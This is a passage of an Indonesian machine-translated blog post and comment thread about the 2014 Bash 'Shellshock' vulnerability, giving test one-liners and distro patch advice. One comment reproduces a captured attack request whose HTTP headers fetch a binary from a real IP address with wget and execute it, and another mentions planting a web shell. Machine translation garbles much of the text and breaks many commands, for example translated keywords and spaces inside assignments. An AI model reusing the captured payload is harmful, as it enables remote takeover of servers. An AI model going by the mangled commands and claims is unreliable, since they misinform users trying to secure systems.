Ini berjalan seperti api di beberapa blog, sebuah cerita diterbitkan di blog keamanan de Red Hat tentang kerentanan yang ditemukan di Bash karena penyalahgunaan variabel global. Menurut berita asli:
“… Kerentanan ini disebabkan oleh fakta bahwa variabel lingkungan dengan nilai yang dibuat secara khusus dapat dibuat sebelum memanggil bash shell. Variabel ini dapat berisi kode yang dijalankan segera setelah shell dipanggil. Nama variabel yang dielaborasi ini tidak masalah, hanya isinya. Akibatnya, kerentanan ini terungkap dalam banyak konteks, misalnya:
- Perintah Angkatan itu digunakan dalam konfigurasi sshd untuk memberikan kemampuan eksekusi perintah terbatas untuk pengguna jarak jauh. Cacat ini dapat digunakan untuk menghindarinya dan memberikan eksekusi perintah yang sewenang-wenang. Beberapa implementasi Git dan Subversion menggunakan Shell yang dibatasi tersebut. Penggunaan reguler OpenSSH tidak terpengaruh karena pengguna sudah memiliki akses ke konsol.
- Server Apache yang menggunakan mod_cgi atau mod_cgid terpengaruh jika skrip CGI ditulis dalam bash, atau sublevel spawn. Sublevel seperti itu digunakan secara implisit oleh system / popen di C, oleh os.system / os.popen dengan Python, jika menggunakan shell system / exec di PHP (saat dijalankan dalam mode CGI), dan buka / sistem di Perl (yang bergantung pada string perintah).
- Skrip PHP yang dijalankan dengan mod_php tidak terpengaruh bahkan jika sublevel dimainkan.
- Klien DHCP meminta skrip shell untuk mengkonfigurasi sistem, dengan nilai yang diambil dari server yang berpotensi berbahaya. Ini akan memungkinkan perintah arbitrer dijalankan, biasanya sebagai root, pada mesin klien DHCP.
- Berbagai daemon dan program dengan hak istimewa SUID dapat menjalankan skrip shell dengan nilai variabel lingkungan yang disetel / dipengaruhi oleh pengguna, yang akan memungkinkan perintah arbitrer dijalankan.
- Aplikasi lain apa pun yang terhubung ke shell atau menjalankan skrip shell seperti menggunakan bash sebagai interpreter. Skrip shell yang tidak mengekspor variabel tidak rentan terhadap masalah ini, meskipun mereka memproses konten yang tidak tepercaya dan menyimpannya di variabel shell (kiri) dan sublevel terbuka.
… »
Bagaimana cara mengetahui apakah bash saya terpengaruh?
Mengingat hal ini, ada cara yang sangat sederhana untuk mengetahui apakah kita terpengaruh oleh kerentanan ini. Faktanya, saya menguji Antergos saya dan ternyata saya tidak punya masalah. Yang harus kita lakukan adalah membuka terminal dan meletakkan:
env x = '() {:;}; echo rentan 'bash -c "echo this is a test"
Jika keluar dengan cara ini kami tidak punya masalah:
env x = '() {:;}; echo rentan 'bash -c "echo ini adalah tes" bash: peringatan: x: mengabaikan upaya definisi fungsi bash: kesalahan mengimpor definisi fungsi untuk `x' ini adalah tes
Jika hasilnya berbeda, Anda mungkin ingin menggunakan saluran pembaruan dari distribusi pilihan kami untuk melihat apakah mereka telah menerapkan tambalan. Jadi, Anda tahu 😉
Diperbarui: Ini adalah keluaran dari rekan kerja yang menggunakan Ubuntu 14:04:
env x = '() {:;}; echo rentan 'bash -c "echo ini adalah tes" rentan ini adalah tes
Seperti yang Anda lihat, sejauh ini rentan.
Saya memiliki Kubuntu 14.04 dari 64 dan saya juga mendapatkan:
env x = '() {:;}; echo rentan 'bash -c "echo this is a test"
rentan
ini adalah sebuah ujian
Saya sudah memperbarui, tetapi tidak benar. Apa yang harus dilakukan?
Tunggu sampai mereka memperbarui. Sudah eOS misalnya diupdate .. 😀
Aneh sekali, saya juga punya Kubuntu 14.04
$ env x = '() {:;}; echo rentan 'bash -c "echo this is a test"
bash: peringatan: x: upaya mengabaikan definisi fungsi
bash: kesalahan mengimpor definisi fungsi untuk 'x'
ini adalah sebuah ujian
Saya menambahkan bahwa versi paket "bash" yang diunduh hari ini adalah:
4.3-7ubuntu1.1
http://packages.ubuntu.com/trusty/bash
Dalam kasus saya, memberikan perintah, itu hanya memberi saya yang berikut di terminal:
>Bagaimanapun, leluconnya adalah saya memperbarui Debian Wheezy dan itulah yang membuat saya putus.
Wheezy masih rentan terhadap bug bagian kedua, setidaknya untuk sore hari (UTC -4: 30) masalahnya masih mengikuti: /
Saya baru saja memverifikasi bahwa setelah menerapkan pembaruan pagi ini baik Slackware maupun Debian atau Centos tidak terpengaruh karena mereka menerima pembaruan yang sesuai.
Apa yang membuat Ubuntu masih rentan di jam-jam ini? Dan katakan padaku itu aman: D.
Tetapi apakah Anda sudah mencoba memperbarui Ubuntu?
Dengan pembaruan hari ini mereka juga telah memperbaikinya.
OK
Pakar keamanan memperingatkan tentang kerentanan 'Bash', ini bisa menjadi ancaman yang lebih besar bagi pengguna Perangkat Lunak Linux daripada bug Heartbleed, di mana peretas dapat mengeksploitasi bug di Bash untuk mengambil kendali penuh atas sistem.
Tod Beardsley, seorang manajer teknik di perusahaan keamanan siber Rapid7, memperingatkan bahwa cacat tersebut dinilai 10 untuk tingkat keparahannya, yang berarti memiliki dampak maksimum, dan diberi peringkat "rendah" untuk kompleksitas eksploitasi, yang berarti yang relatif mudah bagi 'peretas' serangan. Dengan menggunakan kerentanan ini, penyerang berpotensi mengambil kendali sistem operasi, mengakses informasi rahasia, membuat perubahan, dll., ”Kata Beardsley. "Siapapun dengan sistem yang menempati Bash harus segera menerapkan tambalan," tambahnya.
SEBELUM KERENTANAN INI YANG MEMBERIKAN PERANGKAT LAMA (GNU) di mana Bach di-host, akan lebih mudah bagi Perangkat Lunak Linux untuk menyingkirkan GNU dan mengganti alat BSD.
PS: jangan MENYAMBUT kebebasan berekspresi saya, ... tidak menghina siapa pun, ... jangan hapus pesan saya seperti pesan sebelumnya yang sudah saya hapus!.
Oh tolong jangan berlebihan. Betapa saya membenci orang-orang yang menggunakan BSD dan membenci GNU, Linux atau apapun dari proyek-proyek ini.
Saya menyertai Anda dan Anda benar sekali tentang parahnya lubang ini.
Itu bukan penyensoran, itu redundansi (Anda telah membuat komentar yang sama di posting gnome 3.14)
«... Dan dinilai 'RENDAH' UNTUK KOMPLEKSITAS eksploitasi, yang artinya relatif MUDAH untuk serangan hacker»
Apakah ketidaksesuaian terlihat?
Bagaimana cara mudah untuk mengeksploitasi kerentanan dan pada saat yang sama memiliki tingkat risiko yang "rendah" karena sangat rumit untuk digunakan?
Ini adalah bug yang terpecahkan dalam beberapa jam setelah rapat dan, seperti disayangkan, tidak ada laporan telah dieksploitasi (Tentu saja, yang satu ini memiliki lebih sedikit waktu untuk mengenal satu sama lain).
Ini lebih merupakan pers tabloid daripada risiko nyata.
Apakah @Staff tampak tidak penting bagi Anda? Apa yang akan kamu ceritakan sekarang?
DAPATKAN./.HTTP/1.0
Agen-Pengguna:. Terima kasih-Rob
.Cookie: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Host: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Perujuk: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Terima :. * / *
$file nginx
nginx: ELF 32-bit LSB dapat dijalankan, Intel 80386, versi 1 (SYSV), ditautkan secara statis, untuk GNU / Linux 2.6.18, dilucuti
$md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Tahukah kamu apa itu? Tidak ada yang berbahaya ...
Situasinya cukup serius, tapi dari situ untuk mengatakan bahwa Anda harus berhenti menggunakan bash untuk opsi BSD, itu sudah banyak, bagaimanapun juga pembaruannya sudah ada, saya hanya menyentuh pembaruan dan tidak ada yang lain.
Sekarang PD, saya rasa lebih kolega @robet, saya rasa disini admin tidak berdedikasi untuk menghapus komentar seperti ini karena iya, karena semenjak saya berpartisipasi di komunitas ini saya sudah merasakan perasaan itu dan semoga tetap begitu cara.
Salam.
Anda memberi komentar yang sama persis di dua postingan berbeda. Jika Anda mencoba mempromosikan "sumber" cerita, maaf, ini bukan tempatnya.
Bash berasal dari Unix (dan tiruan GNU-nya). Sistem berbasis BSD seperti OSX juga terpengaruh, dan menurut Genbeta, mereka belum menambalnya. Demikian juga, untuk mengakses Bash Anda memerlukan akun pengguna, baik lokal atau melalui SSH.
@Staf:
1.- Ini diklasifikasikan sebagai Level 10 (tingkat bahaya maksimum) karena jumlah layanan yang dapat terpengaruh oleh bug. Dalam catatan utama mereka membuat fakta itu sangat jelas, dengan alasan bahwa bug dapat mempengaruhi layanan seperti apache, sshd, program dengan izin suid (xorg, antara lain).
2.- Ini diklasifikasikan sebagai Tingkat Kesulitan Rendah, dalam hal penerapannya, dan contoh terbaik dari ini adalah skrip uji kerentanan yang ditempatkan @elav di pos. Sangat sulit untuk diterapkan tidak, seperti yang Anda lihat.
Saya tidak melihat redundansi dalam informasi (saya hanya melihat terjemahan Google) dan jika masalahnya cukup serius, dan seperti yang Anda katakan, itu sudah memiliki tambalan dan solusi, tetapi tidak untuk itu, itu tidak lagi berisiko, dan yang cukup nyata.
@petereco / @Yukiteru
Jangan salah sangka, menurut saya yang jelas kritik saya adalah berita bahwa Robet link dan difokuskan pada ketidaksesuaian dan bukan redundansi.
Dengan cara yang sama, kita harus membedakan antara risiko dan bahaya (saya tidak menyebutkan yang terakhir), kita biasanya menggunakannya sebagai sinonim, tetapi di sini, bahaya adalah kapasitas kerusakan bug dan risiko kemungkinan kemunculannya.
Dalam kasus khusus saya, saya masuk dari kemarin. Itu bukan untuk milis atau semacamnya, itu untuk distro desktop! Saya mengangkat telepon dan mengirim pesan ke sysadmin dengan tautannya dan saya mengkonfirmasi bahwa semuanya telah ditambal, lalu maafkan saya tetapi berita ini tidak membuat saya tetap terjaga.
Di forum lain mereka menyebutkan tentang kerentanan Bash, "solusi yang dirilis Debian dan Ubuntu", tetapi hari ini mereka menemukan bahwa kerentanan masih ada, jadi solusinya tidak lengkap, mereka menyebutkannya!
Saya melihat banyak yang mengkritik saya karena fakta sederhana untuk mencegah orang dari keparahan kerentanan -memenuhi syarat dengan tingkat bahaya maksimum 10, dan menyebutkan kemungkinan solusi untuk Perangkat Lunak Linux dalam menghadapi alat GNU yang sudah ketinggalan zaman tempat Bash di-host -yang mana GNU dengan sempurna dapat diganti dengan alat BSD di Perangkat Lunak Linux,… Saya juga menggunakan Linux dan saya suka Linux!
Saya mengklarifikasi bahwa Bash tidak secara default diinstal di BSD, ini adalah satu lagi paket kompatibilitas Linux yang dapat diinstal di BSD ... ya!. Dan sumbernya diletakkan sehingga mereka dapat memeriksa berita, karena banyak pengguna terkadang tidak percaya pesan atau komentarnya.
robet: Seperti yang mereka katakan berulang kali, Anda sudah memasukkan komentar Anda dengan berita di sebuah posting, Anda tidak perlu meletakkannya di setiap posting yang Anda komentari.
Tentang bash, ada cangkang lain yang dapat digunakan jika Bash rentan. 😉
Robet, setahu saya belum ada software yang menggabungkan kernel linux dengan userland BSD. Hal yang paling dekat adalah sebaliknya, kBSD + GNU, seperti yang dilakukan Gentoo dan Debian. Selain itu, GNU (1983) tidak bisa disebut "kuno" jika setelah BSD (1977). Mereka berdua berbagi root unix mereka (tapi bukan kodenya), tidak akan ada "kompatibilitas Linux" jika Bash dibuat ketika Linus T masih anak-anak.
Uh, pengujian debian saat ini "rentan" betapa beruntunnya kami ...
Saya menggunakan Pengujian Debian dan bahkan di cabang ini kami telah menerima pembaruan bash
menurut genbeta juga ada kerentanan lain
http://seclists.org/oss-sec/2014/q3/685
perintah untuk berkonsultasi adalah
env X = '() {(a) => \' sh -c "rentan gema"; bash -c "echo Failure 2 belum ditambal"
env X = '() {(a) => \' sh -c "rentan gema"; bash -c "echo Unpatched Failure 2" sh: X: baris 1: kesalahan sintaksis dekat elemen tak terduga `= 'sh: X: baris 1:` `' sh: kesalahan mengimpor definisi fungsi untuk` X 'sh - Rentan - Kegagalan 2 belum ditambal perintah tidak ditemukanaku yang sama.
Sama disini. Tetapi bug asli di posting telah ditambal di (L) Ubuntu 14.04
Alih-alih melakukan echo sederhana, cobalah membuatnya menjalankan instruksi yang membutuhkan hak istimewa, saya membuang "hak istimewa yang tidak mencukupi" ... bug ini tidak meningkatkan hak istimewa? Jika tidak meningkatkan hak istimewa maka itu tidak seberbahaya mereka melukisnya.
Kamu benar!! mereka adalah dua kerentanan ...
Bagi saya di Linux Mint 17 setelah pembaruan bash kedua yang mereka letakkan di repositori Ubuntu tadi malam, saat menjalankan perintah itu shell menawarkan output ini:
env X = '() {(a) => \' sh -c "rentan gema"; bash -c "echo Fail 2 belum ditambal"
>
Versi "bassh" yang ditempatkan di repositori Ubuntu untuk memperbarui yang sebelumnya adalah:
4.3-7ubuntu1.2
Pada sistem turunan Debian Anda dapat memeriksa versi yang diinstal dengan perintah ini:
dpkg -s bash | grep Version
Bagaimanapun, itu harus diklarifikasi, setidaknya untuk pengguna Debian, Ubuntu dan Mint; Anda tidak perlu terlalu khawatir dengan program yang menjalankan skrip dengan header #! / Bin / sh karena pada distribusi tersebut / bin / sh tidak memanggil "bash", tetapi mengikat ke shell "dash" (tanda hubung adalah :)
Konsol Alkemis Debian (tanda hubung) adalah konsol POSIX turunan
abu.
.
Karena itu mengeksekusi skrip lebih cepat dari bash, dan memiliki lebih sedikit ketergantungan
perpustakaan (membuatnya lebih kuat terhadap kegagalan perangkat lunak atau
hardware), digunakan sebagai konsol sistem default pada sistem
Debian.
Jadi, setidaknya di Ubuntu, "bash" digunakan sebagai shell untuk login pengguna (juga untuk pengguna root). Tetapi setiap pengguna dapat menggunakan shell lain secara default untuk pengguna dan konsol root (terminal).
Sangat mudah untuk memeriksa apakah shell menjalankan skrip (#! / Bin / sh) dengan menjalankan perintah berikut:
file / bin / sh
(outputnya adalah / bin / sh: tautan simbolik ke `tanda hubung ') kita mengikuti jejak yang mengulangi perintah
file / bin / tanda hubung
(outputnya adalah / bin / dash: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV) jadi ini adalah executable.
Ini adalah hasil pada distribusi Linux Mint 17. Pada distribusi berbasis non-Ubuntu / Debian lainnya mungkin berbeda.
Tidaklah sulit untuk mengubah shell default !! Anda bahkan dapat menggunakan yang berbeda untuk pengguna dan untuk pengguna root. Sebenarnya Anda hanya perlu menginstal shell pilihan Anda dan mengubah default dengan perintah "chsh" atau dengan mengedit file / etc / passwd (meskipun pengguna yang tidak mengetahui konsekuensi kesalahan saat mengedit file "passwd", Lebih baik mereka memberi tahu diri mereka sendiri dengan sangat baik dan sebelum mengeditnya, buat salinan aslinya jika perlu untuk memulihkannya).
Saya merasa lebih nyaman dengan "tcsh" (tcsh adalah :)
Konsol TENEX C, versi perbaikan dari Berkeley csh
"Csh" adalah yang digunakan Mac OS X beberapa tahun lalu. Sesuatu yang logis mengingat sebagian besar sistem operasi Apple adalah kode FreeBSD. Sekarang dari apa yang saya baca kemarin, sepertinya mereka juga menyediakan "bash" untuk terminal pengguna.
KESIMPULAN:
- Versi "bash" yang ditambal untuk distribusi yang paling sering digunakan "telah didistribusikan
- "bash" versi 4.3-7ubuntu1.2 dan yang lebih baru tidak mengandung bug ini
- Tidak wajib menggunakan "bash" di OS * Linux
- Beberapa * distribusi Linux memiliki tautan #! / Bin / sh dengan "bash"
- Ada alternatif: ash, dash, csh, tcsh dan banyak lagi
- Tidaklah rumit untuk mengubah shell default yang dipanggil oleh sistem saat membuka terminal
- Beberapa perangkat kecil (router dan lainnya) menggunakan "bash", karena sangat besar !!
Saat ini pembaruan lain baru saja tiba yang menginstal versi lain dari "bash" 4.3-7ubuntu1.3
Untuk Linux Mint 17 dan Ubuntu 14.04.1 LTS
ArchLinux memasuki versi bash-4.3.026-1
@ Xurxo… .csh dari Berkeley?,… Anda memahami sesuatu yang saya bicarakan di atas, dan lebih baik menggunakan BSD “csh”… daripada alat GNU lama tempat Bash di-host. Alat itu adalah yang terbaik untuk Perangkat Lunak Linux.
Saya kira ini bugnya
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
benar?
Dan apa solusinya?
Tunggu mereka memperbarui paket di distro Anda 😉
Serangga itu dibaptis sebagai cangkang
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
rentan
ini adalah sebuah ujian
Belum ada patch untuk Ubuntu Studio 14.04
Diperbaiki di Ubuntu Studio 14.04.1
wisp @ ubuntustudio: ~ $ env x = '() {:;}; echo rentan 'bash -c "echo this is a test"
bash: peringatan: x: upaya mengabaikan definisi fungsi
bash: kesalahan mengimpor definisi fungsi untuk 'x'
ini adalah sebuah ujian
Sebenarnya ini adalah kerentanan kecil, jika itu mempengaruhi Anda itu adalah Anda melakukan sesuatu yang salah sebelumnya ...
Karena skrip bash yang berjalan dengan hak akses root tidak boleh diekspos ke pengguna. Dan jika Anda menjalankan tanpa hak istimewa, tidak ada bulnerabilitas seperti itu. Sebenarnya, itu konyol. Sangat menakutkan.
Saya juga berpikir sama.
Tepatnya, untuk menjual lebih banyak surat kabar atau mendapatkan lebih banyak kunjungan, bug ini bagus.
Tetapi mereka selalu lupa menyebutkan bahwa untuk melanggar komputer dengan skrip semacam ini, Anda harus memiliki akses ke bash terlebih dahulu dan kemudian menjadikannya sebagai root.
staf jika Anda menggunakan apache dengan cgi, cukup masukkan header http sebagai cookie atau referer fungsi yang ingin Anda jalankan. Bahkan telah digunakan untuk menyebarkan cacing.
dan jika seseorang menempatkan shell ke server dengan wget mishell.php, dalam hal ini tidak serius, bukan?
Setuju dengan Anda. Saya pikir itu adalah bug besar seperti yang ada di Heartbleed (bahkan NSA meminjamkan dirinya untuk memicu morbiditas), tetapi bagaimanapun itu adalah bug kecil.
Ada bug lain yang sangat serius seperti konsumsi Flash yang gila-gilaan dan penurunan kinerja di Pepper Flash Player, dan yang telah diperbaiki bug webRTC di Chrome dan Firefox.
Tahukah Anda jika itu memiliki pengaturan untuk orang yang memiliki Linux Mint 16?
Dalam pengujian Debian, itu sudah diperbaiki.
Di 5 distro saya, ini diselesaikan, di OS X saya, saya tidak tahu.
Tolong, jangan menyensor komentar saya, saya katakan OS X. Saya tidak tahu apakah Anda bisa mengatakan OS X di situs ini.
@yoyo baik jangan terlalu panik bahwa mereka masih mengerjakan beberapa detail tambalan ... coba ini dan kemudian beri tahu saya bagaimana XD
env x = '() {:;}; 'bash -c' rentan gema "gema Saya lebih rentan daripada iphone 6 sampah"
Bahwa jika mereka telah menyelesaikannya 100% sebelum OS X, saya bertaruh apa pun
Yah, bahkan di Ars Technica mereka memberikan relevansi dengan Bash di OSX.
@Yoyo komentar selanjutnya di OS X untuk SPAM .. lla tu simpan .. 😛
@yoyo disana perbaiki kutipannya ... tapi selebihnya lho 😉
FSF telah berbicara
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Seperti mereka telah menggurui OSX (karena OSX masih menggunakan Bash: v).
Bagaimanapun, saya tidak perlu terlalu banyak berurusan dengan Debian Jessie.
Jika sistem rentan di Cent OS:
yum bersihkan semua && yum update bash
untuk melihat versi bash:
rpm -qa | terima pesta
Jika versinya lebih lama dari bash-4.1.2-15.el6_5.1, sistem Anda mungkin rentan!
Salam.
Kerentanan kedua belum teratasi
env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "echo Failure 2 belum ditambal"
Memperbarui ...
Hal sebaliknya terjadi pada saya di Gentoo, saya hanya rentan terhadap kegagalan pertama tetapi pada kegagalan kedua saya mendapatkan ini:
[kode] sh: X: baris 1: kesalahan sintaksis dekat elemen tak terduga '='
sh: X: baris 1: '' '
sh: kesalahan mengimpor definisi fungsi untuk 'X'
sh: rentan: perintah tidak ditemukan
Bug 2 tidak ditambal
[/ kode]
Saya tidak tahu apakah akan ada versi stabil dari Bash dengan bug yang diperbaiki, tapi bagaimanapun juga itu akan tertunda untuk waktu berikutnya saya melakukan emerge –sync && emerge –update –deep –with-bdeps = dan - newuse @world (begitulah langkah saya memperbarui seluruh sistem).
Saya memiliki Gentoo dengan versi 4.2_p50 dan sejauh ini telah lulus semua pengujian. Coba jalankan –sync lalu emerge -av1 app-shells / bash, lalu periksa apakah Anda memiliki versi 4.2_p50 menggunakan perintah bash –version.
Sudahkah kamu mencobanya?
Dan dengan paket baru, tes baru yang diberikan Red Hat kepada kita
cd / tmp; rm -f / tmp / echo; env 'x = () {(a) => \' bash -c "tanggal gema"; cat / tmp / echo
Jika sistem kami tidak rentan dan telah ditambal dengan benar, itu harus memberi kami sesuatu seperti ini
1 tanggal
2 cat: / tmp / echo: File atau direktori tidak ada
Coba cara ini:
env X = '() {(a) => \' sh -c "rentan gema"; bash -c "echo Kegagalan 2 ditambal"
saya mendapat
rentan
Bug 2 ditambal.
Lupakan, baris diformat dengan buruk.
Luar biasa! Saya sudah melakukan pembaruan pada Slackware saya, terima kasih!
Hai, Saya punya pertanyaan, saya memiliki beberapa server dengan 10 bit "SUSE Linux Enterprise Server 64".
Ketika saya menjalankan perintah, saya rentan, saya bahkan lebih rentan daripada sampah iPhone 6 xD
Jika saya tidak salah mengupdate / menginstal paket di SUSE itu dilakukan dengan perintah «zypper».
Di beberapa server, ini memberi tahu saya ini:
BIAL: ~ # zypper up
-bash: zypper: perintah tidak ditemukan
BIAL: ~ #
Dan di tempat lain ini:
SMB: ~ # zypper up
Memulihkan sumber sistem…
Mengurai metadata untuk SUSE Linux Enterprise Server 10 SP2-20100319-161944…
Mengurai database RPM ...
Ringkasan:
Tidak ada yang bisa dilakukan.
Apa yang saya lakukan?
Saya tahu bahwa beberapa orang mengatakan kerentanan kurang dari apa yang mereka cat tetapi saya memilikinya dan saya tidak ingin terkena risiko, baik kecil atau besar.
Salam.
Selamat malam, saya sudah mencoba menempelkan kode yang Anda berikan di artikel, saya mengerti
sanders @ pc-sanders: ~ $ env x = '() {:;}; echo rentan 'bash -c "echo this is a test"
ini adalah sebuah ujian
sanders @ pc-sanders: ~ $
Tolong jelaskan kepada saya cara menambal distro, saya memperbarui setiap hari dan saya tidak melihat perubahan dalam output prompt.
Terima kasih banyak!